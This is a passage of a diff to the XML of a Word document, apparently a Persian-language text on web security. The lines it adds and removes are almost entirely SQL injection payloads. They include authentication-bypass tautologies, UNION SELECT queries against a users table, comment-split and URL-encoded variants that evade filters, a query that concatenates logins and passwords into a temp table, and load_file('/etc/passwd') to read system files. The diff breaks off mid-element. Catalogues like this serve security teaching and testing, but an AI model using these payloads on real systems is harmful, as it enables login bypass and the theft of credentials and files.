+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 2 &gt; 1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 'text' &gt; 't' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 'whatever' in ('whatever') </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 2 BETWEEN 1 and 3 ' or username like char(37); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' union select * from users where login = char(114,111,111,116); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' union select  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>Password:*/=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">UNI/**/ON SEL/**/ECT </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">'; EXEC ('SEL' + 'ECT US' + 'ER') </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'/**/OR/**/1/**/=/**/1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' or 1/* +or+isnull%281%2F0%29+%2F* </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">%27+OR+%277659%27%3D%277659 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
         <w:t xml:space="preserve">%22+or+isnull%281%2F0%29+%2F* </w:t>
@@ -39780,7 +38418,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">%27+OR+%277659%27%3D%277659 </w:t>
+        <w:t xml:space="preserve">%27+--+&amp;password= </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39796,7 +38434,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">%22+or+isnull%281%2F0%29+%2F* </w:t>
+        <w:t xml:space="preserve">'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39812,38 +38450,67 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">%27+--+ </w:t>
+        <w:t xml:space="preserve">from users where login &gt;   </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>' or</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">@var select @var as var into temp end -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 1=1</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>' and 1 in (select var from temp)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
         <w:t>—</w:t>
       </w:r>
     </w:p>
@@ -39855,28 +38522,28 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>" or</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">' union select 1,load_file('/etc/passwd'),1,1,1; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1=1</w:t>
-      </w:r>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>—</w:t>
+        <w:t xml:space="preserve">1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39887,1186 +38554,12 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>' or</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1=1 /* </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>or</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1=1-- ' or 'a'='a " or "a"="a </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">') or ('a'='a </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Admin' </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>OR '</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' having</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1=1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' having</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1=1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' group</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> by </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>userid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> having 1=1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' SELECT</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> name FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>syscolumns</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE id = (SELECT id FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>sysobjects</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE name = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>tablename</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">')- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' or</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1 in (select @@version)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' union</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> all select @@version</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'unusual' = 'unusual' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'something' = '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>some'+'thing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'text' = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>N'text</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
